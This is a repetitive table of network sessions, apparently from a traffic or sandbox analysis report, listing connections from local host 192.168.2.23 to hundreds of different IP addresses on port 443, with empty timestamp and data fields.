                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10411192.168.2.235901266.13.44.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10412192.168.2.233671847.142.73.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10413192.168.2.2353734122.125.131.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10414192.168.2.233820880.239.126.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10415192.168.2.2352488166.66.67.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10416192.168.2.2342208173.27.205.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10417192.168.2.235546654.127.172.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10418192.168.2.2357984108.215.24.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10419192.168.2.2338516103.122.227.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10420192.168.2.2351430129.134.232.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10421192.168.2.2344002169.233.203.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10422192.168.2.2340462208.100.99.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10423192.168.2.233649464.164.164.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10424192.168.2.233410873.136.209.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10425192.168.2.2332800124.77.178.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10426192.168.2.2336100156.164.118.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10427192.168.2.2353822149.248.246.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10428192.168.2.235561097.78.85.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10429192.168.2.2338118126.1.6.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10430192.168.2.2353508130.227.213.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10431192.168.2.2342940187.112.46.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10432192.168.2.235478072.84.132.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10433192.168.2.233324262.121.70.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10434192.168.2.2335182103.47.29.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10435192.168.2.234780097.54.99.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10436192.168.2.234927859.241.92.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10437192.168.2.235345644.171.4.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10438192.168.2.2334368166.146.182.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10439192.168.2.2345072197.7.56.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10440192.168.2.233623854.223.195.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10441192.168.2.233713294.226.255.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10442192.168.2.233718297.76.40.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10443192.168.2.2341014222.64.41.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10444192.168.2.234520492.85.42.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10445192.168.2.235081212.146.203.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10446192.168.2.2335428152.165.29.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10447192.168.2.2360196134.23.52.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10448192.168.2.2350364136.100.214.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10449192.168.2.2356996180.79.0.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10450192.168.2.2335212162.48.129.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10451192.168.2.2336146194.111.102.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10452192.168.2.2336618163.14.12.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10453192.168.2.2344902117.192.94.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10454192.168.2.2348752212.213.203.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10455192.168.2.235044278.97.19.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10456192.168.2.2344426131.55.129.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10457192.168.2.2341740175.44.168.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10458192.168.2.2343798203.152.158.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10459192.168.2.2335698193.92.221.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10460192.168.2.2334822136.151.38.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10461192.168.2.234959886.4.161.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10462192.168.2.233762492.28.61.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10463192.168.2.235968265.131.168.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10464192.168.2.2352534176.18.81.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10465192.168.2.2351700213.162.87.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10466192.168.2.2336184190.90.27.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10467192.168.2.2354492175.14.103.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10468192.168.2.235662440.72.198.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10469192.168.2.2335168134.85.146.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10470192.168.2.2359994192.246.133.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10471192.168.2.234292053.224.189.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10472192.168.2.235373213.134.66.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10473192.168.2.234275080.68.76.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10474192.168.2.235455285.136.186.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10475192.168.2.2344760191.208.105.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10476192.168.2.2350056116.255.214.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10477192.168.2.234609258.175.99.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10478192.168.2.2344068205.109.149.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10479192.168.2.235674260.138.68.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10480192.168.2.234725427.38.136.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10481192.168.2.234336467.89.49.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10482192.168.2.2339790208.237.3.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10483192.168.2.233361065.187.206.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10484192.168.2.235119835.143.105.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10485192.168.2.2360932111.73.132.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10486192.168.2.2350072113.126.110.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10487192.168.2.2339486157.125.170.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10488192.168.2.2341930105.7.122.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10489192.168.2.23388148.134.199.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10490192.168.2.2352376156.0.20.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10491192.168.2.2349614223.205.28.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10492192.168.2.2333224193.104.57.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10493192.168.2.235177896.98.152.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10494192.168.2.235939282.45.174.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10495192.168.2.233980245.150.167.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10496192.168.2.235248654.162.124.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10497192.168.2.2351318120.17.7.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10498192.168.2.2333126133.23.42.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10499192.168.2.233981212.2.69.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10500192.168.2.2355056112.123.119.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10501192.168.2.235343669.11.101.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10502192.168.2.2349408174.102.250.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10503192.168.2.235350049.247.200.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10504192.168.2.2355208117.131.130.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10505192.168.2.233641673.9.41.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10506192.168.2.235578684.250.7.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10507192.168.2.2335480132.69.81.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10508192.168.2.235820024.154.8.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10509192.168.2.2337160152.129.14.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10510192.168.2.234833670.77.224.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10511192.168.2.235788012.228.79.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10512192.168.2.2342108150.94.136.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10513192.168.2.233737469.55.232.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10514192.168.2.235273252.168.106.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10515192.168.2.2346570152.223.202.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10516192.168.2.233320649.192.91.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10517192.168.2.235462218.190.66.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10518192.168.2.2355416190.121.190.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10519192.168.2.2355576171.213.147.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10520192.168.2.233688284.228.42.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10521192.168.2.235419853.234.86.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10522192.168.2.2339086117.243.70.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10523192.168.2.2338226107.178.235.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10524192.168.2.235231645.27.5.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10525192.168.2.233571478.188.139.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10526192.168.2.233795840.182.125.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10527192.168.2.233415489.179.197.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10528192.168.2.2357164220.32.77.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10529192.168.2.234419852.43.133.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10530192.168.2.2334312122.38.95.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10531192.168.2.233355649.200.81.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10532192.168.2.2356978219.8.249.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10533192.168.2.2340988121.119.54.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10534192.168.2.235643494.86.82.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10535192.168.2.2355578153.212.12.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10536192.168.2.2340084140.54.217.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10537192.168.2.2345236121.217.195.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10538192.168.2.233282288.174.156.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10539192.168.2.2340694144.123.74.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10540192.168.2.2350518100.143.161.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10541192.168.2.2341398152.217.246.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10542192.168.2.2342464181.252.120.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10543192.168.2.2347378212.86.165.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10544192.168.2.2358146119.170.89.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10545192.168.2.2360962146.248.255.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10546192.168.2.2360480203.230.203.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10547192.168.2.2337134157.53.101.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10548192.168.2.2345570157.153.47.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10549192.168.2.2360544206.126.246.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10550192.168.2.235608019.28.215.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10551192.168.2.235600680.160.247.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10552192.168.2.2341540126.231.146.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10553192.168.2.234947872.252.5.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10554192.168.2.2342690177.33.146.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10555192.168.2.2343708223.119.11.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10556192.168.2.2343816156.32.28.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10557192.168.2.2348762202.224.210.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10558192.168.2.235146866.213.119.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10559192.168.2.233523495.163.67.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10560192.168.2.2334838207.108.58.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10561192.168.2.2350706194.117.114.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10562192.168.2.234113834.111.199.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10563192.168.2.234379099.83.251.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10564192.168.2.233973266.184.178.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10565192.168.2.2340776146.103.144.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10566192.168.2.2352876205.17.38.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10567192.168.2.2351556192.71.177.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10568192.168.2.2356802169.10.57.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10569192.168.2.2344324147.184.243.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10570192.168.2.235675097.68.27.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10571192.168.2.2338574187.231.152.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10572192.168.2.2333240170.17.113.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10573192.168.2.2357124146.167.42.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10574192.168.2.235002890.161.93.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10575192.168.2.2335198128.129.117.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10576192.168.2.233293412.26.71.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10577192.168.2.2355760171.52.209.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10578192.168.2.234976435.106.12.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10579192.168.2.234691291.147.254.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10580192.168.2.2335812181.180.37.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10581192.168.2.2341404108.161.208.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10582192.168.2.235976062.54.95.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10583192.168.2.2359606164.19.66.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10584192.168.2.2344256187.117.168.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10585192.168.2.234955063.28.8.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10586192.168.2.234782871.58.246.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10587192.168.2.2338476157.148.160.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10588192.168.2.233577025.139.4.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10589192.168.2.2360400168.34.68.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10590192.168.2.233350866.130.208.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10591192.168.2.233760678.29.89.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10592192.168.2.2360840160.131.238.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10593192.168.2.2341482137.220.27.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10594192.168.2.2340572196.134.105.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10595192.168.2.233746413.51.237.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10596192.168.2.2357616209.108.149.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10597192.168.2.2347714182.135.200.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10598192.168.2.2356544104.212.200.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10599192.168.2.235144234.231.23.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10600192.168.2.2357746161.43.186.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10601192.168.2.2343782205.5.122.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10602192.168.2.2356036200.87.87.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10603192.168.2.23443885.222.23.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10604192.168.2.2337588160.30.7.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10605192.168.2.234832698.164.129.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10606192.168.2.2348944211.63.53.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10607192.168.2.234647427.61.109.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10608192.168.2.235502284.35.113.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10609192.168.2.2337352203.141.6.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10610192.168.2.233609477.204.197.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10611192.168.2.2356352132.152.205.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10612192.168.2.2357614159.0.10.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10613192.168.2.2356714109.87.149.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10614192.168.2.234774853.30.72.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10615192.168.2.2334630178.49.156.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10616192.168.2.234858446.65.195.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10617192.168.2.2357984222.161.115.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10618192.168.2.2349328209.143.8.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10619192.168.2.2360870133.239.111.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10620192.168.2.234427257.50.246.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10621192.168.2.235873265.86.125.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10622192.168.2.2339230170.217.46.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10623192.168.2.233920864.170.123.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10624192.168.2.233518668.121.102.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10625192.168.2.2347304105.155.120.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10626192.168.2.2359174121.117.30.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10627192.168.2.2359336110.139.79.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10628192.168.2.2357746112.4.202.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10629192.168.2.235158060.119.244.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10630192.168.2.2336530212.91.249.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10631192.168.2.2359280169.235.115.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
